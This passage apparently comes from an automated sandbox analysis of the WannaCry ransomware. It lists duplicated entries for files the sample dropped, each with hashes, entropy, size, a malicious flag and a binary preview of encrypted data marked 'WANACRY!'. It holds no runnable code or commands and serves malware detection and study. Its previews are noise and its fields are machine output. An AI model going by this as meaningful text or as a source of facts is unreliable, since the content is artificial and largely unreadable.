                                                                                      SHA1:463794AC316493C2008D24D0F249087F2675FA74
                                                                                      SHA-256:AD0EB72C61AAD618AA897895A2C98BB2B4BEC2CEC2194C06BC57639C6EB669D3
                                                                                      SHA-512:62BE0CEBDC825E4EE18D58B129112BA664C933C81410D8CF6DCB6BCD610E4ADF5A7C9D1071D03C3D097B29C354134947E4A62ECC1FABB8EE2B233480C561230A
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........<7w..Y.H{cb..^ ...5.'.p.......h......Y4. ..+J.."..T...+.@>.3.....AK...#..7...6.P.J.......*...9. .O..p....Q.~...f.h....k~V/..h.F|u....L.....0{..p%.,.\AfO.Rx7s*..|..^..}...<.-..=..WUXI.S..C.&...h..&-....#..oC.,.Md.......J%..i%+.q-.Bx.p.../.....@.........-.m.....3x......j25r0p..`....<Z.j.%....p_....1.Y.m......&.8...v....U2h>2....i.}].....Xb...K...!..M..k...a.f."Ja..4|.'.g....-tB.U.).......R2.].......S....VR(..c.728O.....w.d,.}.5m.dT..|...W..W}$..m.m.....=.x.(.D...=..(.=....;<.;.+.J..q._...Fo......e...l.VM.m..Q.~...'......8....`...QU.|\i_..v.....4.b..}...m.;....XLQ#.&|.{.x.$..MB...."..B./.&9o...Z.1R,.I.r... 3..u....}.......Y....!..].....f,.c.Y.0.q.4...S...E'p.... ....lX&..o.Y.._w[KD..W#...LV..1...gbFv.s.6...Wf....p..]...-.t..a1..-.W.e])....,.I...s1.j..+B.q..a..=.b\.'a#..1...7,.....+... ....E..d.9.3QH....!.[8::...h$.n.J..2-..S.=6..7....N..g..~.T..'..4.@N.....C...0.8.q.R..Jr.:.:..~.P...r..:..Z.}...9..|.zS....;yT....y......a,.Igw
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.988984997859855
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:CZvqBWrOonrGSTiQe8WHbl67Ulsfo36KhH3wE6cuU:CZz6onr/mHh670qK9gGR
                                                                                      MD5:643E41AB3A12D417F2B01E87835D127F
                                                                                      SHA1:3A9A21362F7B5163D223681293FA4A02DB0450A7
                                                                                      SHA-256:DE9F80EFBACC369EBBAE94C8733845603C28322ABB301ACFCD41EB16316CD083
                                                                                      SHA-512:1FD604240432ADB9A318904ED650683E0BEEE2A0A4E5010BA44CA174481E62D32149A80112504F1A15CB51336C5FE0127A88A54365AB6A64909848F8850528B9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....=aP..f...J...8.7m#>.T.8.e..[.}.K...:...5S.9..p.k.P._..G.`@..&.I...3H.....DT...X.I/R.V.c..ck...._t..iI......X.j.g..P..Ui..F6N.C..l........1.u.GR..:...V.Q..d..^.DE.g.uoN.....]....P1*....).......lg0z5.. .w.t1........@.Y...K....../Wx.$=14.z..r......@......VD!X.......<.AfV]@..<..W.....&.q=.V....-......K........Zu`.H.IU..ZV.^{....xS3z.`.nW.......q.U.H....`k........9ml@|.d5..Ka...b.>.,..n..`N..P.N..e....J...H,...o..|....s.dQh...-...l.-y......&k..y..Z....(.A\..syHY'w.rs`....&..!.w..&.kj0,.D(@.4~:.|R2}.B.%"c?C0........Z./k......}L..x.a...B.1..cFU....b...>M.....#..H..;.\5......=....W..UVl.....V....X.V.q......q.+...........cL..tb..].^...9.d.....(....5.NUy..n.2c_7..;+:].5.1.j...X-.....J...o'....Q.N..w...k. ^4..}..&_..[.m<......LV.X.....)~.3...!.n...*.z2..V;..Kg.19.. 3...kr&T....U......~..Q.s...).....0d..).T.@.m.%.Z"...u....h8...9=.....iH.=C.)q.LQ.."/J..6.;2\?............i_..E..N.%..f.%.g.n.<..-..4..<.......XN....L.D...z.3.l..C..y...;.N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16664
                                                                                      Entropy (8bit):7.988984997859855
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:CZvqBWrOonrGSTiQe8WHbl67Ulsfo36KhH3wE6cuU:CZz6onr/mHh670qK9gGR
                                                                                      MD5:643E41AB3A12D417F2B01E87835D127F
                                                                                      SHA1:3A9A21362F7B5163D223681293FA4A02DB0450A7
                                                                                      SHA-256:DE9F80EFBACC369EBBAE94C8733845603C28322ABB301ACFCD41EB16316CD083
                                                                                      SHA-512:1FD604240432ADB9A318904ED650683E0BEEE2A0A4E5010BA44CA174481E62D32149A80112504F1A15CB51336C5FE0127A88A54365AB6A64909848F8850528B9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....=aP..f...J...8.7m#>.T.8.e..[.}.K...:...5S.9..p.k.P._..G.`@..&.I...3H.....DT...X.I/R.V.c..ck...._t..iI......X.j.g..P..Ui..F6N.C..l........1.u.GR..:...V.Q..d..^.DE.g.uoN.....]....P1*....).......lg0z5.. .w.t1........@.Y...K....../Wx.$=14.z..r......@......VD!X.......<.AfV]@..<..W.....&.q=.V....-......K........Zu`.H.IU..ZV.^{....xS3z.`.nW.......q.U.H....`k........9ml@|.d5..Ka...b.>.,..n..`N..P.N..e....J...H,...o..|....s.dQh...-...l.-y......&k..y..Z....(.A\..syHY'w.rs`....&..!.w..&.kj0,.D(@.4~:.|R2}.B.%"c?C0........Z./k......}L..x.a...B.1..cFU....b...>M.....#..H..;.\5......=....W..UVl.....V....X.V.q......q.+...........cL..tb..].^...9.d.....(....5.NUy..n.2c_7..;+:].5.1.j...X-.....J...o'....Q.N..w...k. ^4..}..&_..[.m<......LV.X.....)~.3...!.n...*.z2..V;..Kg.19.. 3...kr&T....U......~..Q.s...).....0d..).T.@.m.%.Z"...u....h8...9=.....iH.=C.)q.LQ.."/J..6.;2\?............i_..E..N.%..f.%.g.n.<..-..4..<.......XN....L.D...z.3.l..C..y...;.N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):424136
                                                                                      Entropy (8bit):7.999591350474021
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:jeqoQvTxQEfACg1X0+NiZA3tYWs+K7nSA0m:SvQrof/z3tjsPRf
                                                                                      MD5:D59144684EBDB12CD30FDF66084FB473
                                                                                      SHA1:C69663F26F2665034ED766B021E7AD0FA6659C01
                                                                                      SHA-256:6CAA239D21D03C76056CDFF492AF466886AB13C20146D1E518C7FDECA9174C8F
                                                                                      SHA-512:ADDC4ECD18147675D2901F2906911C78CE17F1072CA86FBF59C5E533FA72C0D638D7A96CF244D51EB2BF43D567EBD456B888BD88EE7EDAA30EC5A435B0788268
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t.......9<...c.q.....Pr... ..2...\..x.E..h..<.<PH._}.......#x..f._.*.t.G.F.....O.....M,}..p.s5V1(......G..4.H.....!..V..S...........2.@..... .....-.s.n.KOt...i~f.}....}.*.4.."H.....nm.....T.M.m"j@.U....l.5...<g........c.-.,X..1D........k..;.9..).....w......rr.cn......;/...s.MU..Nz.....b......,k...(5y..t.YEA.5......]sq*...W7...._..<.?... .X#.~...]..:.....~...g..JH........d...z..I...>.._A..4.rO6._......&]..d=....w.f..!..#.$bz....-..x ;..V.h...:-F-..J.M.XDi..:.L.I......=M..].......S.+.w......k..,..}E.4.Kd...-.K..x.)f.-.......{|G.....^..d......D.....f.../(#j.4'..Qz...%...fN+.k?.O....Z.d.[..............;..**3.....>~...j..Y.<4.b.. .5.}..i.;..............x!W.j>K.....v..._...lm.z..[.m(. ..:.>.......q..*..HoET.8_.....X.Tt;...u.U.9......I..T..T.}..n....E....SEee..9.nD.0......"..T.B..{=|..Y...q..(8.,S0..L......R...6q+q.6.YX.......p...D.3.....fS.`D.RF7&*..4..a...DgP.@...wr^5.3p..gs...G.X5U&..".3.N>.=.V9..\)+O...V.%3._Y..W....j.||....l.qe]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):424136
                                                                                      Entropy (8bit):7.999591350474021
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:jeqoQvTxQEfACg1X0+NiZA3tYWs+K7nSA0m:SvQrof/z3tjsPRf
                                                                                      MD5:D59144684EBDB12CD30FDF66084FB473
                                                                                      SHA1:C69663F26F2665034ED766B021E7AD0FA6659C01
                                                                                      SHA-256:6CAA239D21D03C76056CDFF492AF466886AB13C20146D1E518C7FDECA9174C8F
                                                                                      SHA-512:ADDC4ECD18147675D2901F2906911C78CE17F1072CA86FBF59C5E533FA72C0D638D7A96CF244D51EB2BF43D567EBD456B888BD88EE7EDAA30EC5A435B0788268
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t.......9<...c.q.....Pr... ..2...\..x.E..h..<.<PH._}.......#x..f._.*.t.G.F.....O.....M,}..p.s5V1(......G..4.H.....!..V..S...........2.@..... .....-.s.n.KOt...i~f.}....}.*.4.."H.....nm.....T.M.m"j@.U....l.5...<g........c.-.,X..1D........k..;.9..).....w......rr.cn......;/...s.MU..Nz.....b......,k...(5y..t.YEA.5......]sq*...W7...._..<.?... .X#.~...]..:.....~...g..JH........d...z..I...>.._A..4.rO6._......&]..d=....w.f..!..#.$bz....-..x ;..V.h...:-F-..J.M.XDi..:.L.I......=M..].......S.+.w......k..,..}E.4.Kd...-.K..x.)f.-.......{|G.....^..d......D.....f.../(#j.4'..Qz...%...fN+.k?.O....Z.d.[..............;..**3.....>~...j..Y.<4.b.. .5.}..i.;..............x!W.j>K.....v..._...lm.z..[.m(. ..:.>.......q..*..HoET.8_.....X.Tt;...u.U.9......I..T..T.}..n....E....SEee..9.nD.0......"..T.B..{=|..Y...q..(8.,S0..L......R...6q+q.6.YX.......p...D.3.....fS.`D.RF7&*..4..a...DgP.@...wr^5.3p..gs...G.X5U&..".3.N>.=.V9..\)+O...V.%3._Y..W....j.||....l.qe]
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):111256
                                                                                      Entropy (8bit):7.998479697709195
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:C5QNs0s2LZM/NERdddui6Zyp/WHN5SV3T9w5fRFf:MQanKrR5ui6WWtapw5
                                                                                      MD5:46996977E119E9A4F4563ED8BBA9144F
                                                                                      SHA1:29FE4543C1BD93D5D9A461F530E0857DEDA9708C
                                                                                      SHA-256:1AE12B6A83328B47B283A856C0B98A5120C085AAB410A21BF6A62876AB737832
                                                                                      SHA-512:D7FC41A9938A65748E37CEF670FF426673AB766297BBA8D9540315C3C01608E3195B18D8031E351586681B951211FCFBB4C26D86BBCC156858DFFE2248A55FCB
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........5........>3.0..4..%kM.y..Ej..#.@./....^j.|.#Sp..x. ..A.[d6.R..1..,o$...*.~FJ.IN..CS...l...%r.6..i.e.Y....\.xb:HO..>.&...HZ.N:.)[f...>d....|%.<.\#C,x.uR.F...6I.wzI.$.?...P.VM....5S...../.{.So..C$..q.._Y.C..<....^.%m.1..O\..|zW=G..[...9{ae.+8R....x.........6w\..0.......^..O....f...G8Y..w....;.L...SpbwR...T...../.&AA...,3.f.~.Y..jP...=.t}.;.......:..eS.dFzE....,3....@v-..pO.H]c...5,p.T..5\"..2JJ.e...P...A..q#..{c_.......2.$.`...<.Y.....m..+....7.......p....\;.....I......l.....L........|a.=.....g...}.cR...y.W.P.k...%=.......g..v..ap.U)..Y.u_..mW....2.....C.u.}.&.m&o...I.;....x......p.@6.w..V..w.q.E.xw[.;.@.B.D.u.....Icm.I..`.k.J.k.-.A..9.. .....,J`p...XP{../'......L....$.x.@^.Z.r....N..SH.XuT...{p..3.... U...K....dy.0....O.....Bn......>z...!.#<X......H.*ME...9.cR...~..S.y.S...S.e....7..>.r.Ut....j.Mn.bF?X[.....i...J.Q.#../.!..".d.z+u......!P.9S..w...EL......b.`4.S.H..o/....Z~W.s...T"..n.{..w..-QU*....... 9...yW/6sF..v..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):111256
                                                                                      Entropy (8bit):7.998479697709195
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:C5QNs0s2LZM/NERdddui6Zyp/WHN5SV3T9w5fRFf:MQanKrR5ui6WWtapw5
                                                                                      MD5:46996977E119E9A4F4563ED8BBA9144F
                                                                                      SHA1:29FE4543C1BD93D5D9A461F530E0857DEDA9708C
                                                                                      SHA-256:1AE12B6A83328B47B283A856C0B98A5120C085AAB410A21BF6A62876AB737832
                                                                                      SHA-512:D7FC41A9938A65748E37CEF670FF426673AB766297BBA8D9540315C3C01608E3195B18D8031E351586681B951211FCFBB4C26D86BBCC156858DFFE2248A55FCB
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........5........>3.0..4..%kM.y..Ej..#.@./....^j.|.#Sp..x. ..A.[d6.R..1..,o$...*.~FJ.IN..CS...l...%r.6..i.e.Y....\.xb:HO..>.&...HZ.N:.)[f...>d....|%.<.\#C,x.uR.F...6I.wzI.$.?...P.VM....5S...../.{.So..C$..q.._Y.C..<....^.%m.1..O\..|zW=G..[...9{ae.+8R....x.........6w\..0.......^..O....f...G8Y..w....;.L...SpbwR...T...../.&AA...,3.f.~.Y..jP...=.t}.;.......:..eS.dFzE....,3....@v-..pO.H]c...5,p.T..5\"..2JJ.e...P...A..q#..{c_.......2.$.`...<.Y.....m..+....7.......p....\;.....I......l.....L........|a.=.....g...}.cR...y.W.P.k...%=.......g..v..ap.U)..Y.u_..mW....2.....C.u.}.&.m&o...I.;....x......p.@6.w..V..w.q.E.xw[.;.@.B.D.u.....Icm.I..`.k.J.k.-.A..9.. .....,J`p...XP{../'......L....$.x.@^.Z.r....N..SH.XuT...{p..3.... U...K....dy.0....O.....Bn......>z...!.#<X......H.*ME...9.cR...~..S.y.S...S.e....7..>.r.Ut....j.Mn.bF?X[.....i...J.Q.#../.!..".d.z+u......!P.9S..w...EL......b.`4.S.H..o/....Z~W.s...T"..n.{..w..-QU*....... 9...yW/6sF..v..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):102344
                                                                                      Entropy (8bit):7.998427693406494
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:HUt++uw/3/n/atFfcde3iu2YxindDG2IRE5QVXAc7+j0zle92IhXFkEocfsTTYdA:y9X/atFfcrdq24E5QVA92IbkEoksYO
                                                                                      MD5:F60739D169BE676E4F17F412F645CB53
                                                                                      SHA1:05B48B2320BBF1926D7FE2D9D44DAA040C56690F
                                                                                      SHA-256:99C2927795A39DE347F8B8F96F37391D50F096B9274F049D71361C7D9C0B2680
                                                                                      SHA-512:7CC5183528BC4B99340B80EF1C88341EAB82EFA9F1FDFCFF6549304626CF15413CC33565F0A7FD08721CEAFC582EB6779EFFE5AA5E9AF392F8C1252A263743C8
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....%.K.'s.E......\%x..=^....3......."$.h.$./|..Y.......... ...'...^...5,..&@...d.N...#..&x.Uc..y.3..^......r...].+.]....@-.B..tQU..@.....w..6......@......Z..o;8..o....E.$P../Vjk..E....J].wt(.,.*...@V4.zN..z.=....G4...%.".R0.%"jN7.2.@.m.l1.z....!.Rxy..............tvT.@@.l....K...2..mt...b.x...*..M%=...?.k.#2D.,...!.......mM.\.....j.....[)|..9..N.......<...... ......V.%....W....-..&J*.$...G.= ...,...{*..gR...D...+...E=Ua........l&[.1.3.X...o=.5.{Sh.G./6 .......<.I.....O..$...2.z..>c[.<..;uy7.0...=D..2...r......9...j.d_.\<...n..f.p....B.'..,wLDz..p......>e......k; ..r.!!..H...V.bp.z.t..w...6&..x+.)..|,.=...Y0e.lI...TrGL.vQ..4#.)S...ds.ef..&......N...n.`..?.V..>^rX......+.0....ZP.Y....F...>Z.J.|.WDRt.......J...o.....b$......zsBu.....tn.B.Lrs.Er.+...6$..@f.~&.x..$...I.5.<..j.=E..Wwi......J.........7.x,vp..t.^.....C.l.*.........I..HX..G.?.l.p..].v.......gez.@......;c.L!Y2.IJp.K.....Fg...[. S.d.......L.....P..}...kW..s..BTM..`.k.b...../..M
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):102344
                                                                                      Entropy (8bit):7.998427693406494
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:HUt++uw/3/n/atFfcde3iu2YxindDG2IRE5QVXAc7+j0zle92IhXFkEocfsTTYdA:y9X/atFfcrdq24E5QVA92IbkEoksYO
                                                                                      MD5:F60739D169BE676E4F17F412F645CB53
                                                                                      SHA1:05B48B2320BBF1926D7FE2D9D44DAA040C56690F
                                                                                      SHA-256:99C2927795A39DE347F8B8F96F37391D50F096B9274F049D71361C7D9C0B2680
                                                                                      SHA-512:7CC5183528BC4B99340B80EF1C88341EAB82EFA9F1FDFCFF6549304626CF15413CC33565F0A7FD08721CEAFC582EB6779EFFE5AA5E9AF392F8C1252A263743C8
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....%.K.'s.E......\%x..=^....3......."$.h.$./|..Y.......... ...'...^...5,..&@...d.N...#..&x.Uc..y.3..^......r...].+.]....@-.B..tQU..@.....w..6......@......Z..o;8..o....E.$P../Vjk..E....J].wt(.,.*...@V4.zN..z.=....G4...%.".R0.%"jN7.2.@.m.l1.z....!.Rxy..............tvT.@@.l....K...2..mt...b.x...*..M%=...?.k.#2D.,...!.......mM.\.....j.....[)|..9..N.......<...... ......V.%....W....-..&J*.$...G.= ...,...{*..gR...D...+...E=Ua........l&[.1.3.X...o=.5.{Sh.G./6 .......<.I.....O..$...2.z..>c[.<..;uy7.0...=D..2...r......9...j.d_.\<...n..f.p....B.'..,wLDz..p......>e......k; ..r.!!..H...V.bp.z.t..w...6&..x+.)..|,.=...Y0e.lI...TrGL.vQ..4#.)S...ds.ef..&......N...n.`..?.V..>^rX......+.0....ZP.Y....F...>Z.J.|.WDRt.......J...o.....b$......zsBu.....tn.B.Lrs.Er.+...6$..@f.~&.x..$...I.5.<..j.=E..Wwi......J.........7.x,vp..t.^.....C.l.*.........I..HX..G.?.l.p..].v.......gez.@......;c.L!Y2.IJp.K.....Fg...[. S.d.......L.....P..}...kW..s..BTM..`.k.b...../..M
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):75240
                                                                                      Entropy (8bit):7.997543704805603
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:cCCIzwnaj4pqtrm4+o/RT4MLygT/ctH/gx8WSc:cIwnajgqM3oNygzy/gmWh
                                                                                      MD5:DDDAEB560499BD6550710AAA219E7A79
                                                                                      SHA1:BA4FFD9F7E3F3D8CE4BE054AC3C459C48E9CD5AA
                                                                                      SHA-256:A43EB124B196958806FAEEEF3D234A81A236F38D4CCC54FA84B8809E8174C9E0
                                                                                      SHA-512:73B9D3A08503D532932B8C8EA16C36CA58A0E0BC86A977CA2650445C4D514E9666357CDAF3B05B9974DD5C44CE80E42A687B5991C60A73CF559FE996C659DB24
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....V..O.;..$u...g./.!_.++<lo..P-..X.Yv..fE.M.W..mz._.A..".........7.]p(..iV.".m...q...s..?-.G..:_..:B......I....N..E..D.Q...6T...w.......5M..I.....e.x$.a.zBS.C...#...x.^.LSp...T.xG._!0g@.A....G..P.........}..{...eR....M...z._..d.U...|....y..Q......$......i.9.z.y../..<zd...,..v...&].J..n.../...b. .P.....+M.<.c.j).....T..TX8...5p..%x.g.A..V~./....M...6H?cZ.....F.'..&...p...'.....[y..M.3k.."h.ySr....$..^..;....A...8.k.dKnO.}...wN....No..?....a..H"...$.D.|.n.d...p.4.A4...E...MTs._...g,..j.8.I.N,.|.[5..N.J..9..2..ne.*......Wq.$....v.E..UrS....!...qC./.2..D.Zr..n..7..a..........Os".!.!i.|~...;...'$.K..@W..{4...0J....7m..zO.....$Mxx.bj..L'.}0[....,..G.@<....r.m....O......s.gkF.nV.or..u..%.dK.(.^.mX.....O^a....R@[.C...M.>.W.6..]...a.....W.....~..w8.#..S./@..3.)G.t.K.9.d.28.......BcQ..v.9.z..w.....<...+.c.....S..74m33@...k....&1.6...:..-._.\;$s.....I...>..0..CC.....a.h......S....\1s.U|V.7...r..G.@../3j...........W.JI.0.o...y...d.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):75240
                                                                                      Entropy (8bit):7.997543704805603
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:cCCIzwnaj4pqtrm4+o/RT4MLygT/ctH/gx8WSc:cIwnajgqM3oNygzy/gmWh
                                                                                      MD5:DDDAEB560499BD6550710AAA219E7A79
                                                                                      SHA1:BA4FFD9F7E3F3D8CE4BE054AC3C459C48E9CD5AA
                                                                                      SHA-256:A43EB124B196958806FAEEEF3D234A81A236F38D4CCC54FA84B8809E8174C9E0
                                                                                      SHA-512:73B9D3A08503D532932B8C8EA16C36CA58A0E0BC86A977CA2650445C4D514E9666357CDAF3B05B9974DD5C44CE80E42A687B5991C60A73CF559FE996C659DB24
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....V..O.;..$u...g./.!_.++<lo..P-..X.Yv..fE.M.W..mz._.A..".........7.]p(..iV.".m...q...s..?-.G..:_..:B......I....N..E..D.Q...6T...w.......5M..I.....e.x$.a.zBS.C...#...x.^.LSp...T.xG._!0g@.A....G..P.........}..{...eR....M...z._..d.U...|....y..Q......$......i.9.z.y../..<zd...,..v...&].J..n.../...b. .P.....+M.<.c.j).....T..TX8...5p..%x.g.A..V~./....M...6H?cZ.....F.'..&...p...'.....[y..M.3k.."h.ySr....$..^..;....A...8.k.dKnO.}...wN....No..?....a..H"...$.D.|.n.d...p.4.A4...E...MTs._...g,..j.8.I.N,.|.[5..N.J..9..2..ne.*......Wq.$....v.E..UrS....!...qC./.2..D.Zr..n..7..a..........Os".!.!i.|~...;...'$.K..@W..{4...0J....7m..zO.....$Mxx.bj..L'.}0[....,..G.@<....r.m....O......s.gkF.nV.or..u..%.dK.(.^.mX.....O^a....R@[.C...M.>.W.6..]...a.....W.....~..w8.#..S./@..3.)G.t.K.9.d.28.......BcQ..v.9.z..w.....<...+.c.....S..74m33@...k....&1.6...:..-._.\;$s.....I...>..0..CC.....a.h......S....\1s.U|V.7...r..G.@../3j...........W.JI.0.o...y...d.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.188509802226419
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEnius1l73i40au4TSVvUPhLXB1ZmRq0c9aH/baptYe9T7LV:bkEnns15PJPfmKwGtYe5PV
                                                                                      MD5:B10F4B70044CED6D71E50E58AB187D1F
                                                                                      SHA1:5A84A7A9A06BC7B4A0B5614CFACE8E822F62E295
                                                                                      SHA-256:1C765EE9E3CF6148223532D6093170FE7F7C153050A73A98D5226741698B432D
                                                                                      SHA-512:835D8294353C0E3717857410EF592354C698DFF2E6D5C779E5A9452835E42534DC940982E554E7DB296950037DC6C2384E51A10423ADE2842D4A90A35A20725A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....~ ..5L....}pgY.^....;..h..5^z7.s.......R...."...L1.......$....P.!....n\i.I....9vs.&C?..-.e...r...>.5...(e.N............Iu.v;.........!~/UZ..C....J.V.-..+.u....?..7.|/.d....{...c.m...N8n......:..(U./..q.....e.yYsp..ua....aXY.^........>....................0S...`u....}....S\'O...i.X_n.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):312
                                                                                      Entropy (8bit):7.188509802226419
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEnius1l73i40au4TSVvUPhLXB1ZmRq0c9aH/baptYe9T7LV:bkEnns15PJPfmKwGtYe5PV
                                                                                      MD5:B10F4B70044CED6D71E50E58AB187D1F
                                                                                      SHA1:5A84A7A9A06BC7B4A0B5614CFACE8E822F62E295
                                                                                      SHA-256:1C765EE9E3CF6148223532D6093170FE7F7C153050A73A98D5226741698B432D
                                                                                      SHA-512:835D8294353C0E3717857410EF592354C698DFF2E6D5C779E5A9452835E42534DC940982E554E7DB296950037DC6C2384E51A10423ADE2842D4A90A35A20725A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....~ ..5L....}pgY.^....;..h..5^z7.s.......R...."...L1.......$....P.!....n\i.I....9vs.&C?..-.e...r...>.5...(e.N............Iu.v;.........!~/UZ..C....J.V.-..+.u....?..7.|/.d....{...c.m...N8n......:..(U./..q.....e.yYsp..ua....aXY.^........>....................0S...`u....}....S\'O...i.X_n.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999790798664453
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:jRqAyTZotT6EbWuKB8Uete3ugMwXzcDKV+k+hIXsnUtg9lVCxUL6TJ:9q12h5biWUete3rhcWVZXcUklsqy
                                                                                      MD5:6CD6361D43F85D008227596CCC719677
                                                                                      SHA1:ED1D0084BC6F504C00B3F696F08D563C643B9081
                                                                                      SHA-256:5D92578EF7D02CD3F302F8E7EA9C670786BE51CFDE5ADB7B5E7C936D357C7537
                                                                                      SHA-512:584F06A096EB0F00E6E204E9D2F1AED5038C389A9DA0671E8A896EE015CB5C7D477BFC38F3A0DD98B31A5EEE81BC7B92461AFF765E69620BCA2800EBC81E7ED7
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....7ck.c......t.......tki...eE37t.y..-.........@.4V..}..%..}q.H|..44.....).g=H>...E......~.m.[.....y...j.4n..sD6(.JQ..N..t.-/......;.K5...).\'.7@.5ws2.;q2..e".J..9/..J..7.}..MF.7..."..<....~v..T......M.Xf5:OV3.y.}g.J8J|.....yB...JO...O...'..]R..Y.................[-....N9H.m..=..p[.....,y.#.|K2.n;....~.B.k.]o...X...~o......2U`1....=F....;s...2...."..I(.cVz... ..V..6..~I'....Y.z<.T&.T.'......4.Z.......#....Y..,...hG.D`....dq....Q.Egf0\.t|rjB......o!.....JV...%l.....az...fV....y..X.&.............Dq.;..:.....!.!.1.. ......P1qF}l!.g..z.*.6*....Men.A.....@)......`.dlI.R.J...`...;..'.Oj.w..{.Z..3.Q.mVO...!.6.".#..6....-|..,.`.4@.EM.L,-n..,.a..... ...2.=..u_l...e.....8....#.l.[.^%MX....B... 3..G...1.Uu.?>.....{..$..QC.:.~.z.l..-|..+R2..8...x......e8=..{8K.RzN...'x=t....+....jw.O.pMZ.yc.t...f.:...L....:.X...P.Z..~.E..U}%J.m....P..E%.6.....A8Si..6..^.9$w.....7.u.}.e..h...>.....&.W.L'....j....k2...d.s.@..}...z.[..k;......b.....o.l.H.p..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1048856
                                                                                      Entropy (8bit):7.999790798664453
                                                                                      Encrypted:true
                                                                                      SSDEEP:24576:jRqAyTZotT6EbWuKB8Uete3ugMwXzcDKV+k+hIXsnUtg9lVCxUL6TJ:9q12h5biWUete3rhcWVZXcUklsqy
